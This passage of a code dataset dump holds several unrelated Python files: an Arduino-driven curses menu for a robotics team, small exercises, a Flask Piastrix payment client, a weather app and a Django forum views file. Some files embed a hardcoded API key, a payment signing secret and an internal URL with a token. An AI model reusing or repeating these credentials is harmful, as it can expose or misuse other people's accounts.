threading.Timer(0.1, flash_led_actual, [led])\n flash_timer.start()\n except:\n flash_timer = threading.Timer(0.1, flash_led_actual, [led])\n flash_timer.start()\n\n\ndef print_current_menu(stdscr, cur_stat, led_blue = None, led_camera = None):\n # genel olarak her menüyü (panic mode ve match mode gibi istisnalar dışında) yazdıran fonksiyon\n # curses'ın screen objesini ve içinde menü elemanları olan cur_stat'a ihtiyacı var\n firsttime = True\n\n if type(cur_stat[\"current_menu_elements\"][0]) is list: #eğer elemanlar listesi başka bir listenin içerisindeeyse\n cur_stat[\"current_menu_elements\"] = cur_stat[\"current_menu_elements\"][0] # onları listeden çıkar\n\n stdscr.clear() # ekranı temizle\n h, w = stdscr.getmaxyx() # ekranın enini ve boyunu al\n\n for idx, row in enumerate(cur_stat[\"current_menu_elements\"]): # menü elemanlarındaki her elemanın üzerinden gider\n if cur_stat[\"current_menu_status\"][idx]: # eğer eleman doğru ise yeşil\n colornumber = 3\n\n elif not cur_stat[\"current_menu_status\"][idx]: # yanlış ise kırmızı\n colornumber = 2\n\n else: # başka ise normal \n colornumber = 4\n\n x = w // 2 - (len(row) + 1) // 2 # elemanın uzunluğuna göre x'i ve y'yi ayarlıyor\n y = h // 2 - (len(cur_stat[\"current_menu_elements\"]) + 1) // 2 + idx\n\n if idx == cur_stat[\"current_row\"]: # eğer o eleman seçili ise beyaz\n stdscr.attron(curses.color_pair(1))\n stdscr.addstr(y, x, row)\n stdscr.attroff(curses.color_pair(1))\n\n else: # değilse olması gereken renk.\n stdscr.attron(curses.color_pair(colornumber))\n stdscr.addstr(y, x, row)\n stdscr.attroff(curses.color_pair(colornumber))\n\n if firsttime: # eğer ilk seferse y'i bir azalt\n firsty = y - 1\n firsttime = False\n elif not firsttime:\n pass\n\n for i in cur_stat[\"all_menu_elements\"][main_menu_value][1]: # tüm elemanların True mu false mı olduğunu arıyor\n if i: \n match_message = \" ## MATCH MODE CAN BE STARTED ## \"\n match_message_color = 4\n if not led_blue is None and not led_camera is None:\n ArduinoFunctions.led_write(led_blue, led_camera, 1)\n match_mode_can_be_started = True\n else:\n match_message = \" ## MATCH MODE CANNOT BE STARTED ## \"\n match_message_color = 2\n if not led_blue is None:\n match_mode_can_be_started = False\n flash_led(led_blue)\n break\n\n # eğer hepsi doğru ise match mode can be started, eğer bir tanesi bile yanlış ise match mode cannot be started diyor\n\n firstx = w // 2 - (len(match_message) + 1) // 2 \n\n stdscr.attron(curses.color_pair(match_message_color))\n stdscr.addstr(firsty - 1, firstx, match_message)\n stdscr.attroff(curses.color_pair(match_message_color))\n\n teamname = \"FRC7839 \" #ekranın sağ üstünde ismimizi yazdırma olayı\n namex = w - len(teamname)\n namey = 0\n\n stdscr.attron(curses.color_pair(3))\n stdscr.addstr(namey, namex, teamname)\n stdscr.attroff(curses.color_pair(3))\n\n stdscr.refresh() # ekranı yenilemek\n\n\ndef print_menu_for_match(stdscr, m_menu_elements):\n stdscr.clear() #ekranı temizle\n h, w = stdscr.getmaxyx() # en ve boy al\n\n for idx, row in enumerate(m_menu_elements): #verilen değerlerde\n x = w // 2 - (len(row) + 1) // 2 # y ve x hesaplamaları\n y = h // 2 - (len(m_menu_elements) + 1) // 2 + idx\n\n stdscr.attron(curses.color_pair(4)) #ekrana ekle\n stdscr.addstr(y, x, row)\n stdscr.attroff(curses.color_pair(4))\n\n stdscr.refresh() # ekranı yenile\n\n\ndef cursor_handler(key, cur_stat):\n # eğer bir menüde aşağıya gidilmek isterse bunu gerçekleştiren ve en altta ise yukarıya atan kod.\n # Imlec Asagi\n current_row = cur_stat[\"current_row\"]\n\n if (key == \"button1\") and (\n current_row < (len(cur_stat[\"current_menu_elements\"]) - 1)\n ):\n\n current_row += 1\n\n # Imlec Dongu (yeniden en yukarıya çıkması)\n elif (\n current_row == (len(cur_stat[\"current_menu_elements\"]) - 1) and key == \"button1\"\n ):\n\n current_row = 0\n\n return current_row\n\n\ndef set_current_menu(cur_stat, all_menu_elements):\n cur_menu = int(cur_stat[\"current_menu\"])\n\n cur_stat[\"current_menu_elements\"] = all_menu_elements[cur_menu][0]\n cur_stat[\"current_menu_status\"] = all_menu_elements[cur_menu][1]\n\n return cur_stat[\"current_menu_elements\"], cur_stat[\"current_menu_status\"]\n\n\ndef return_to_menu(key, cur_stat, stdscr):\n # bir menüdeyken en alttakı tuşa basıldı ise ana menüye geri atan kod.\n # Ana Menuye Cikma\n settings = None \n if (\n (key == \"button0\")\n and cur_stat[\"current_menu\"] != 0\n and cur_stat[\"current_row\"] == (len(cur_stat[\"current_menu_elements\"]) - 1)\n ):\n cur_stat[\"current_row\"] = 0\n cur_stat[\"current_menu\"] = 0\n\n settings = DbFunctions.get_setting(file_s)\n handle_error(settings, stdscr, PanicMenu=True)\n\n # write settings'de write settings butonuna bastığında da ana menüye atan kod\n if (\n (key == \"button0\")\n and cur_stat[\"current_menu\"] == arduino_menu_value\n and cur_stat[\"current_row\"] == (len(cur_stat[\"current_menu_elements\"]) - 2)\n ):\n cur_stat[\"current_row\"] = 0\n cur_stat[\"current_menu\"] = 0\n\n settings = DbFunctions.get_setting(file_s)\n handle_error(settings, stdscr, PanicMenu=True)\n\n return cur_stat[\"current_row\"], cur_stat[\"current_menu\"], settings\n\n\ndef background_setup(stdscr, cur_stat=None, PanicMode=False):\n bruh = None\n #herhangi bir menüde iken tüm değerler True iken arkaplanı yeşil, de��ilken kırmızı yapan kod\n if PanicMode == True: \n stdscr.bkgd(\" \", curses.color_pair(2)) #burası arkaplanı ayarlayan curses fonksiyonu\n\n elif cur_stat is not None and cur_stat[\"current_menu\"] == 0:\n for i in cur_stat[\"current_menu_status\"]:\n if i:\n stdscr.bkgd(\" \", curses.color_pair(3))\n bruh = 1\n\n elif not i:\n bruh = 0\n stdscr.bkgd(\" \", curses.color_pair(2))\n break\n\n if bruh is not None and bruh == 1:\n flash_led.exitthread = True\n\n\n elif cur_stat is not None and cur_stat[\"current_menu\"] != 0:\n stdscr.bkgd(\" \", curses.color_pair(4))\n\n\ndef refresh_screen(stdscr, key, team_no_pos, cam_offset_pos, cur_stat, settings, team_ip2, led_blue = None, led_camera = None):\n # ekranda bir değişiklik yapıldığında gerekli değişiklikler yapılıp yeniden print_menu yapan kod\n new_all_menu_elements = cur_stat[\"all_menu_elements\"] \n\n new_all_menu_elements[main_menu_value] = get_first_menu_values(team_ip2) # ana menü değerlerini yeniden alıyor\n new_all_menu_elements[ip_menu_value] = get_ip_menu_values( # ip menüsü değerlerini yeniden alıyor\n team_ip2, InputPFunctions.get_ipaddr() # ip adresini yeniden kontrol ediyor\n )\n new_all_menu_elements[arduino_menu_value] = get_arduino_menu_values(settings) # ayarlar menüsü değerlerini yeniden alıyor\n new_all_menu_elements[camera_menu_value] = get_cam_menu_values() # camera menüsü değerlerini yeniden alıyor\n\n # cur_stat[\"all_menu_elements\"] = new_all_menu_elements\n # cur_stat[\"current_menu_elements\"] = new_all_menu_elements[c\"ur_stat[\"current_menu\"]]\n\n # Background seysi\n background_setup(stdscr, cur_stat) \n\n # Background ayarlandiktan sonra menu yazdirildi\n print_current_menu(stdscr, cur_stat, led_blue, led_camera)\n\n # ayarlar menüsü için team_no olayı\n print_team_no_edit(stdscr, settings[\"Team Number\"], team_no_pos, cur_stat)\n\n # ayarlar menüsü için camera_offset olayı\n print_cam_offset_edit(stdscr, settings[\"Camera Offset\"], cam_offset_pos, cur_stat)\n\n return new_all_menu_elements\n\n\n# region\n\n# def handle_errors(stdscr=None, PanicMenu=True, *args):\n# for variable in args:\n# if type(variable) == str:\n# if str(variable).startswith(\"InputP\"):\n# background_setup(stdscr, None, PanicMode=True)\n\n# if test_mode is not None:\n# raise Exception(str(variable))\n\n# else:\n# if PanicMenu:\n# match_mode(stdscr, PanicMenu=True, errmsg=variable)\n# else:\n# print_info(stdscr, variable, color=2, time=5)\n# return True\n# else:\n# return False\n\n# endregion\n\n\ndef handle_error(err_msg, stdscr=None, PanicMenu=True, clean=False):\n # bir değer verildiğinde error olup olmadığını kontrol eden kod.\n # eğer panicmenu açık ise bir error olduğunu fark ettiğinde panic moda geçiyor.\n if type(err_msg) == str: # eğer verilen değer string ise\n if str(err_msg).startswith(\"InputP\"): # ve error ise\n err_type = None \n \n # error tipini bulmak için olan kod\n if err_msg in [all_errors[READ_ERR], all_errors[WRITE_ERR]]:\n err_type = \"FILE\"\n\n elif err_msg in [\n all_errors[ARDUINO_CONN_ERR],\n all_errors[ARDUINO_CONN_LOST],\n all_errors[ARDUINO_INPUT_ERR],\n ]: #\n err_type = \"ARDUINO\"\n\n background_setup(stdscr, None, PanicMode=True) # arkaplanı kırmızı yapıyor\n\n if test_mode is not None: # eğer testmodu açık ise \n raise Exception(str(err_msg)) # hata verdiriyor, panic moduna girmiyor\n\n else: # eğer test mode kapalı ise\n if PanicMenu: #eğer panic modu açıksa pnic moduna giriyor\n match_mode(\n stdscr, PanicMenu=True, errmsg=err_msg, err_type=err_type\n )\n\n else: # eğer panic modu kapalı ise sadece ekrana error mesajını alta yazdırıyor\n if not clean:\n print_info(stdscr, err_msg, color=2)\n\n return True # error olduğu için true döndürüyor\n\n else: # eğer error değilse false döndürüyor\n return False\n\n\ndef set_tip(team_number):\n # ip kontrol için takım numarasını alıp kontrol ettiği ip değerini ayarlayan kod\n team_ip2 = team_number\n\n if len(team_ip2) == 3:\n team_ip2 = \"0\" + team_ip2[0] + \".\" + team_ip2[1:]\n\n elif len(team_ip2) == 4:\n team_ip2 = team_ip2[0:2] + \".\" + team_ip2[2:]\n\n return team_ip2\n\n\ndef not_main(stdscr):\n flash_led.exitthread = True\n # region while dongusune kadar olan gereksiz seyler\n\n # region Settings okuma\n settings = DbFunctions.get_setting(file_s)\n handle_error(settings, stdscr, PanicMenu=True)\n # endregion\n\n team_ip2 = set_tip(settings[\"Team Number\"]) #takım numarasına göre ip ayarlıyor\n\n all_menu_elements = [] # her menünün elemanlarını alıyor\n all_menu_elements.append(get_first_menu_values(team_ip2)) \n all_menu_elements.append(get_ip_menu_values(team_ip2, InputPFunctions.get_ipaddr()))\n all_menu_elements.append(get_arduino_menu_values(settings))\n all_menu_elements.append(get_cam_menu_values(None))\n all_menu_elements.append(get_info_menu_values(None))\n\n # Imlec konumu\n current_row = 0\n # Aktif olan menu\n current_menu = 0\n # Aktif olan menudeki elemanlar\n current_menu_elements = all_menu_elements[0][0]\n # Aktif olan menudeki elemanlarin renk degerleri\n current_menu_status = all_menu_elements[0][1]\n\n cur_stat = {\n \"current_row\": current_row,\n \"current_menu\": current_menu,\n \"current_menu_elements\": current_menu_elements,\n \"current_menu_status\": current_menu_status,\n \"all_menu_elements\": all_menu_elements,\n }\n\n # RENKLER\n # 2 = RED\n # 3 = GREEN\n # 4 = NORMAL\n\n # region curses renklerini ayarlayan kısım\n curses.curs_set(0)\n curses.init_pair(1, curses.COLOR_BLACK, curses.COLOR_WHITE)\n curses.init_pair(2, curses.COLOR_WHITE, curses.COLOR_RED)\n curses.init_pair(3, curses.COLOR_WHITE, curses.COLOR_GREEN)\n curses.init_pair(4, curses.COLOR_WHITE, curses.COLOR_BLACK)\n\n # endregion\n\n # Kodun calisip calismadipini anlamak icin kullandigimiz port 5802\n # Ve ledin kapanip acma bilgisinin yazildigi port da 5803\n\n # endregion\n\n team_no_pos = 9\n cam_offset_pos = 9\n msg = None\n key = None\n\n\n # ekranı yazdır\n refresh_screen(stdscr, key, team_no_pos, cam_offset_pos, cur_stat, settings, team_ip2)\n\n # time.sleep(1)\n # region arduino import\n\n # kod başlarken importing arduino mesajı verir\n # board = pyfirmata.ArduinoNano(\"COM4\")\n errortimer = threading.Timer(0.1, print_error, args=[stdscr, \"InputP: Importing Arduino...\", 3])\n errortimer.start()\n\n\n # sonradan arasındaki farkı bulup ne kadar zaman geçtiğini anlamak için şimdiki zamanı alır\n start_t = timeit.default_timer()\n ###\n\n com_ports = ArduinoFunctions.check_ports() # com portları alır\n time.sleep(1)\n if type(com_ports) == list: # eğer com port'lara birşey takılı ise\n board = ArduinoFunctions.import_arduino(com_ports) # arduinoyu import et\n\n else: # yoksa error ver\n board = all_errors[ARDUINO_CONN_ERR] \n\n ###\n # geçen zamanı bul\n elapsed = timeit.default_timer() - start_t\n \n #eğer 5 saniyeden az sürdü ise 5 saniyeyi tamamla (Çoğunlukla çok daha uzun sürüyor)\n if elapsed < 5:\n time.sleep(5 - elapsed)\n # error mesajı ver\n # errortimer = threading.Timer(0.1, print_error, args=[stdscr, None])\n # errortimer.start()\n\n # eğer arduino import edildi ise\n if not type(board) == str:\n\n # swt1 = board.get_pin(\"a:1:i\")\n # pot1 = board.get_pin(\"a:2:i\")\n # inp1 = board.get_pin(\"a:6:i\")\n # led_camera = board.get_pin(\"d:10:p\")\n # but1 = board.get_pin(\"d:2:i\")\n # but2 = board.get_pin(\"d:7:i\")\n # led1 = board.get_pin(\"d:11:p\")\n \n # Tüm arduino pinlerin tanımlaması\n \n \n pot1 = board.get_pin(pot1_str)\n swt1 = board.get_pin(swt1_str)\n but1 = board.get_pin(but1_str)\n but2 = board.get_pin(but2_str)\n led_camera = board.get_pin(cam_str)\n led_blue = board.get_pin(blue_str)\n led_green = board.get_pin(green_str)\n led_red = board.get_pin(red_str)\n\n # butonların basıldığını anlamak için iteratörleri çalıştırır\n time.sleep(0.5)\n iterator= pyfirmata.util.Iterator(board)\n iterator.start()\n time.sleep(0.5)\n\n # eğer potansiyometreden değer okuyamazsa iteratör hata verdi demektir\n if pot1.read() is None:\n handle_error(all_errors[ARDUINO_INPUT_ERR], stdscr, PanicMenu=True)\n \n # eğer board str ise arduino import başarısız olmuş demektir\n elif type(board) == str:\n handle_error(board, stdscr)\n\n else:\n # Arduino basarili bir sekilde import edilirse mesaj verecek\n print_info(stdscr, all_infos[ARDUINO_CONNECTION_SUCCESS] , color=3)\n\n time.sleep(0.2)\n\n # endregion\n\n rv = ArduinoFunctions.led_write(led_blue, led_camera, 1.0) \n handle_error(rv, stdscr, PanicMenu=True) # led ayarlamasından error mu döndü kontrol eder\n check_arduino_thread() # arduino takılımı diye kontrol eden thread başlar<< \n time.sleep(0.5)\n \n while True:\n \n # eğer sadece bakacağın menülerde ise row'u çıkış butonuna kitler\n if cur_stat[\"current_menu\"] == ip_menu_value:\n cur_stat[\"current_row\"] = 4\n elif cur_stat[\"current_menu\"] == camera_menu_value:\n cur_stat[\"current_row\"] = 1\n elif cur_stat[\"current_menu\"] == info_menu_value:\n cur_stat[\"current_row\"] = 4\n\n ##########\n # Ekran yenilenmesi\n cur_stat[\"all_menu_elements\"] = refresh_screen(\n stdscr, key, team_no_pos, cam_offset_pos, cur_stat,settings, team_ip2, led_blue, led_camera,\n )\n \n key, ports = ArduinoFunctions.key_get( # arduino'dan değer alır\n but1, but2, pot1, wait_time_for_get_key\n )\n\n if key is None: # eğer None döndürürse\n isKeyError = True # hata verdi demektir\n else:\n isKeyError = False\n\n handle_error(ports, stdscr, PanicMenu=True) # hatalı mı kontrol\n\n if key is None:\n continue\n\n handle_error(key, stdscr, PanicMenu=True) # hata var mı kontrol\n\n # Imlec hareketleri degiskenlere yazildi\n cur_stat[\"current_row\"] = cursor_handler(key, cur_stat)\n\n ##########\n\n # arduino_check_thread kullanımı\n # not: lütfen tüm değişkenleri okuma/yazma olaylarını \"Try/except\" içine alın thread başlamadı ise hata verir\n # thread başlatmak için: arduino_check_thread()\n # threadi durdurmak için: arduino_check_thread.exitthread = True (try except içine al)\n # thread'den değer okumak için (example yerine değerin yazılmasını istediğiniz değişken): example = arduino_check_thread.rv (try except içine al)\n \n \n for i in cur_stat[\"all_menu_elements\"][main_menu_value][1]: # eğer menüdeki herşey True ise Match Mod'a girebilir hale getirir\n if i:\n canGoToMM = True\n elif not i:\n canGoToMM = False\n break\n pass \n # Mac Modu\n if (\n canGoToMM == True\n and ArduinoFunctions.map_x(pot1.read(), 0, 1, 0, max_v) == 0 # eğer potansiyometre en solda ve switch de solda ise \n and ArduinoFunctions.map_xi(swt1.read(), 0, 1, 0, max_v) == max_v\n and cur_stat[\"current_menu\"] == main_menu_value\n ):\n match_mode(stdscr, settings, led_blue, led_camera, led_red, led_green, swt1, pot1, isKeyError) # match mode başlat\n # region arduino menu ozel\n if cur_stat[\"current_menu\"] == 2: # eğer arudino menüsünde ise potansiyomentre'den değer okuyan yer\n if (\n key not in [\"button1\", \"button0\", \"switch on\", \"switch off\"] \n and cur_stat[\"current_row\"] == 0 # eğer robo_loc'da ise\n ):\n settings[\"Robot Location\"] = ArduinoFunctions.get_robo_loc_from_inp(\n key, max_v\n )\n\n elif (\n key not in [\"button1\", \"button0\", \"switch on\", \"switch off\"]\n and cur_stat[\"current_row\"] == 1 # cam_tol'de ise\n ):\n settings[\"Camera Tolerance\"] = str(key)\n\n elif (\n key not in [\"button1\", \"button0\", \"switch on\", \"switch off\"]\n and cur_stat[\"current_row\"] == 2 # waiting_period'da ise\n ):\n settings[\"Waiting Period\"] = str(key // 2)\n\n elif (\n key not in [\"button1\", \"button0\", \"switch on\", \"switch off\"]\n and cur_stat[\"current_row\"] == 3 # autonomus_mod'da ise\n ):\n settings[\"Autonomous Mode\"] = str(\n ArduinoFunctions.map_x(key, 0, max_v, 0, 5)\n )\n\n if cur_stat[\"current_row\"] == 5 and team_no_pos == 9:\n team_no_pos = 0\n if cur_stat[\"current_row\"] == 4 and cam_offset_pos == 9:\n cam_offset_pos = 0\n\n\n # Team degistirme seysi\n if cur_stat[\"current_row\"] == 5:\n if key == \"button0\": # buton0'a bastığında sonraki haneye geçer\n if team_no_pos < 4:\n team_no_pos += 1\n\n if team_no_pos >= 4:\n team_no_pos = 0\n\n if type(key) == int: # eğer potansiyometre değeri ise o haneye atar\n settings[\"Team Number\"] = (\n settings[\"Team Number\"][0:team_no_pos]\n + str(ArduinoFunctions.map_x(key, 0, max_v, 0, 9))\n + settings[\"Team Number\"][(team_no_pos + 1) : 4]\n )\n\n if cur_stat[\"current_row\"] == 4: \n if key == \"button0\": # buton0'a bastığında sonraki haneye geçer\n if cam_offset_pos < 3:\n cam_offset_pos += 1\n\n if cam_offset_pos >= 3:\n cam_offset_pos = 0\n \n \n if type(key) == int:\n settings[\"Camera Offset\"] = (\n settings[\"Camera Offset\"][0:cam_offset_pos]\n + str(ArduinoFunctions.map_x(key, 0, max_v, 0, 9))\n + settings[\"Camera Offset\"][(cam_offset_pos + 1) : 3]\n )\n\n\n\n if cur_stat[\"current_row\"] != 5:\n team_no_pos = 9 # 9 sadece 0 ile 3 arasinda olmayan bir deger olarak\n\n \n if cur_stat[\"current_row\"] != 4:\n cam_offset_pos = 9 # 9 sadece 0 ile 3 arasinda olmayan bir deger olarak\n\n\n # Write tusu, ayarları JSON dosyasına yazar\n if key == \"button0\" and cur_stat[\"current_row\"] == 6:\n\n rv = DbFunctions.save_settings(file_s, settings)\n handle_error(rv, stdscr, PanicMenu=True)\n\n # if waiting_period is not None:\n # DbFunctions.write_setting_to_txt(waiting_period, file)\n\n all_menu_elements[2] = get_arduino_menu_values(settings)\n\n cur_stat[\"current_menu_elements\"] = all_menu_elements[2][0]\n cur_stat[\"current_menu_status\"] = all_menu_elements[2][1]\n\n # endregion\n\n\n # Menu degistirme olaylari\n cur_stat[\"current_row\"], cur_stat[\"current_menu\"], rv = InputPFunctions.change_menu( \n key, cur_stat, led_green, led_camera\n )\n handle_error(rv, stdscr, PanicMenu=False, clean=False)\n \n # ana menüye dönme\n cur_stat[\"current_row\"], cur_stat[\"current_menu\"], sett = return_to_menu(\n key, cur_stat, stdscr\n )\n (\n cur_stat[\"current_menu_elements\"],\n cur_stat[\"current_menu_status\"],\n ) = set_current_menu(cur_stat, all_menu_elements)\n # team_ip'yi yeniden hesaplama\n team_ip2 = set_tip(settings[\"Team Number\"])\n\n if sett is not None and not type(sett) == 4:\n settings = sett\n\n try:\n rv = check_arduino_thread_rv # arduino takılı mı\n except:\n pass\n else:\n if not rv:\n handle_error(all_errors[ARDUINO_CONN_LOST], stdscr, True) # error verdi mi kontrol\n \ntry:\n curses.wrapper(not_main)\nexcept KeyboardInterrupt:\n try:\n if flash_led.flashthreadopen:\n flash_led.exitthread = True \n except:\n pass\n ","sub_path":"InputPlus.py","file_name":"InputPlus.py","file_ext":"py","file_size_in_byte":57920,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"616827773","text":"N=input()\r\nN2,T,C = N,0,1\r\nwhile(True):\r\n for i in range(len(N)):\r\n T+=int(N[i])\r\n if T<10:\r\n if len(N2)<=1:\r\n C=0\r\n break\r\n else:\r\n N,T,C = str(T),0,C+1\r\nif T%3==0:\r\n print(str(C)+\"\\nYES\")\r\nelse:\r\n print(str(C)+\"\\nNO\")\r\n","sub_path":"1000-1999/1769.py","file_name":"1769.py","file_ext":"py","file_size_in_byte":275,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"133444155","text":"#Um programa que lê vários números até receber 999(condição de parada) Mostra quantos valores foram inseridos e a soma deles\n\nnum = 0\ncount= 0\nall = []\nsum1 = 0\nsum2 = 0\nvav = 0 \nnum = int(input('Digite um número inteiro qualquer (999 para parar) '))\n\nwhile num != 999:\n count += 1\n sum1 += num \n all.append(num)\n \n while vav < (len(all)):\n sum2 += all[vav] \n vav += 1\n num = int(input('Digite um número inteiro qualquer (999 para parar) '))\n\nprint(f'Ok, você inseriu {count} valores, sendo eles {all} a soma total é {sum1}')\n","sub_path":"Exercicios-mundo-2/desafio064b.py","file_name":"desafio064b.py","file_ext":"py","file_size_in_byte":567,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"286753781","text":"from collections import OrderedDict\nfrom hashlib import sha256\n\nfrom flask import render_template, redirect\n\nimport requests\n\nfrom . import app\nfrom .exceptions import CurrencyNotFound, PiastrixInvoiceRequestError, PiastrixBillRequestError\n\n\nlogger = app.logger\n\n\nclass PiastrixService:\n shop_id = 5\n secretKey = 'SecretKey01'\n payway = 'payeer_rub'\n\n def __init__(self, amount: int = None, currency: str = None, description: str = None, shop_order_id: int = None):\n self.amount = amount\n self.currency = currency\n self.description = description\n self.shop_order_id = shop_order_id\n\n def get_sign(self, data):\n ordered_data = OrderedDict(sorted(data.items()))\n stringify_values = [str(value) for value in list(ordered_data.values())]\n string_for_sign = ':'.join(stringify_values) + self.secretKey\n logger.debug(f\"Raw string for sign: {string_for_sign}\")\n sign = sha256(string_for_sign.encode('utf-8')).hexdigest()\n logger.debug(f\"Sign: {sign}\")\n return sign\n\n def pay(self):\n pay_data = {\n \"currency\": self.currency,\n \"amount\": self.amount,\n \"shop_id\": self.shop_id,\n \"shop_order_id\": self.shop_order_id\n }\n sign = self.get_sign(pay_data)\n pay_data['sign'] = sign\n pay_data['description'] = self.description\n pay_data['url'] = 'https://pay.piastrix.com/ru/pay'\n logger.info(f'Piastrix pay data: {pay_data}')\n return pay_data\n\n def bill(self):\n url = 'https://core.piastrix.com/bill/create'\n data = {\n \"shop_amount\": self.amount,\n \"shop_currency\": self.currency,\n \"shop_id\": self.shop_id,\n \"shop_order_id\": self.shop_order_id,\n \"payer_currency\": self.currency\n }\n sign = self.get_sign(data)\n data['sign'] = sign\n logger.info(f\"Request for piastrix bill: {data}\")\n response = requests.post(url, json=data)\n response = response.json()\n if response['result']:\n logger.info(f\"Piastrix bill response: {response}\")\n url_for_redirect = response['data']['url']\n return url_for_redirect\n else:\n logger.error(f'Error response during piastrix bill: {response}')\n raise PiastrixBillRequestError('Bad request for bill')\n\n def invoice(self):\n url = 'https://core.piastrix.com/invoice/create'\n data = {\n \"amount\": self.amount,\n \"currency\": self.currency,\n \"payway\": self.payway,\n \"shop_id\": self.shop_id,\n \"shop_order_id\": self.shop_order_id,\n }\n sign = self.get_sign(data)\n data['sign'] = sign\n logger.info(f\"Request for piastrix invoice: {data}\")\n response = requests.post(url, json=data)\n response = response.json()\n if response['result']:\n logger.info(f\"Piastrix invoice response: {response}\")\n invoice_data = {\n \"url\": response['data']['url'],\n \"lang\": \"ru\",\n \"m_curorderid\": response['data']['data']['m_curorderid'],\n \"m_historyid\": response['data']['data']['m_historyid'],\n \"m_historytm\": response['data']['data']['m_historytm'],\n \"referer\": response['data']['data']['referer'],\n \"method\": response['data']['method'],\n }\n logger.info(f'Piastrix invoice data: {invoice_data}')\n return invoice_data\n else:\n logger.info(f'Error response during piastrix invoice: {response}')\n raise PiastrixInvoiceRequestError('Bad request for bill')\n\n\ndef get_piastrix_service(amount: int = None, currency: str = None, description: str = None, shop_order_id: int = None):\n return PiastrixService(amount, currency, description, shop_order_id)\n\n\ndef get_piastrix_action(piastrix, currency):\n if currency == '978':\n return render_template('pay.html', data=piastrix.pay())\n if currency == '840':\n return redirect(piastrix.bill())\n if currency == '643':\n return render_template('invoice.html', data=piastrix.invoice())\n else:\n raise CurrencyNotFound('Get invalid code currency')","sub_path":"src/app/services.py","file_name":"services.py","file_ext":"py","file_size_in_byte":4276,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"211205503","text":"import eel\r\nimport pyowm\r\nowm = pyowm.OWM(\"8bdd33f2a79072c140b1e6d317f98af0\")\r\n\r\n@eel.expose\r\ndef get_weather_icon(place):\r\n\t#owm = pyowm.OWM(\"8bdd33f2a79072c140b1e6d317f98af0\")\r\n\tmgr = owm.weather_manager()\r\n\r\n\tobservation = mgr.weather_at_place(place)\r\n\tw = observation.weather\r\n\r\n\tweat = w.status\r\n\r\n\r\n\tprint(weat)\r\n\tprint(place)\r\n\tif weat == 'Mist':\r\n\t\treturn \"https://image.flaticon.com/icons/svg/578/578116.svg\"\r\n\telif weat == 'Clear':\r\n\t\treturn \"https://image.flaticon.com/icons/svg/578/578153.svg\"\r\n\telif weat == 'Clouds':\r\n\t\treturn \"https://image.flaticon.com/icons/svg/578/578116.svg\" #Clouds\r\n\telif weat == 'Rain':\r\n\t\treturn \"https://image.flaticon.com/icons/svg/578/578132.svg\"\r\n@eel.expose\r\ndef get_weather(place):\r\n\r\n\tmgr = owm.weather_manager()\r\n\r\n\tobservation = mgr.weather_at_place(place)\r\n\tw = observation.weather\r\n\tweath = w.status\r\n\ttemp = w.temperature('celsius')['temp']\r\n\r\n\treturn \"В \" + place + \" сейчас \" + str(temp) + \" градусов\"\r\n\r\n\r\neel.init(\"webs\")\r\neel.start(\"main.html\", size=(800, 700))\r\n","sub_path":"HTML APP/Build 1.0.0.a1/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1035,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"478858603","text":"import pandas as pd\r\n\r\nclosed_count_url = 'http://cwprod/CATSWebNET/main.aspx?WCI=Main&WCE=SubmitQry&WCU=%7c*%7eq%3d8%7c*%7er%3d24c370aa8efa4db78f7fafd5dd0c8593%7c*%7ef%3d-1%7c*%7eo%3d3%7c*%7ep%3dComplaint%20Folder%7c*%7es%3d8P7LQMWZINV3YGT8IYTKSBAE939R21HD' \r\n\r\ndef createDataframe(url):\r\n df_html = pd.read_html(url)\r\n data_table = df_html[1]\r\n\r\n col_names = list()\r\n\r\n for index, row in data_table.iloc[[0]].iterrows():\r\n for i in range(len(data_table.columns)):\r\n col_names.append(row[i])\r\n\r\n data_table.columns = col_names\r\n data_table = data_table.drop(data_table.index[0])\r\n data_table = data_table.set_index('Complaint Number')\r\n return data_table\r\n\r\n#df_closed = createDataframe(closed_count_url)\r\n\r\ndf_140 = pd.read_pickle('Overall_140.pickle')\r\ndf_140['Decision Date'] =pd.to_datetime(df_140['Decision Date'])\r\n\r\ndesc = df_140.sort_values('Decision Date', ascending=False)\r\ndesc.to_excel('desc.xlsx')\r\n\r\nasce = df_140.sort_values('Decision Date')\r\nasce.to_excel('asce.xlsx')\r\n\r\n#df_140_unique = pd.DataFrame(df_140['Complaint Folder'].unique(), columns=['Complaint Folder',])\r\n\r\n#print(df_140_unique.head())\r\n","sub_path":"closedCount.py","file_name":"closedCount.py","file_ext":"py","file_size_in_byte":1142,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"652549413","text":"from django.http import HttpResponse, HttpResponseRedirect\nfrom django.shortcuts import render\nfrom forum.models import Forum, Thread, Post\nfrom django.core.urlresolvers import reverse\nfrom django.core.paginator import Paginator, EmptyPage, PageNotAnInteger\n\ndef home(request):\n forums = Forum.objects.all()\n context = {'forums':forums}\n return render(request, \"forum/home.html\", context)\n\ndef paginate(request, items, page_limit):\n paginator = Paginator(items, page_limit)\n page_num = request.GET.get('page')\n try:\n page_of_items = paginator.page(page_num)\n except PageNotAnInteger:\n page_of_items = paginator.page(1)\n except EmptyPage:\n page_of_items = paginator.page(paginator.num_pages)\n return page_of_items\n\ndef forum(request, pk):\n \"\"\"List threads in a forum.\"\"\"\n threads = Thread.objects.filter(forum=pk).order_by(\"-created\")\n page_of_threads = paginate(request, threads, 5)\n context = {'threads': page_of_threads, 'pk':pk}\n return render(request, 'forum/forum.html', context)\n\ndef thread(request, pk):\n \"\"\"Listing of posts in a thread.\"\"\"\n posts = Post.objects.filter(thread=pk).order_by(\"-created\")\n posts = paginate(request, posts, 7)\n thread = Thread.objects.get(pk=pk)\n title = thread.title\n forum_pk = thread.forum.pk\n context = {'posts': posts, \n 'pk': pk, \n 'title': title,\n 'forum_pk': forum_pk}\n return render(request, \"forum/thread.html\", context)\n\ndef post(request, post_type, pk):\n \"\"\"Display a post form.\"\"\"\n action = reverse(\"forum.views.%s\" % post_type, args=[pk])\n if post_type == \"new_thread\":\n title = \"Start New Topic\"\n subject = ''\n elif post_type == \"reply\":\n title = 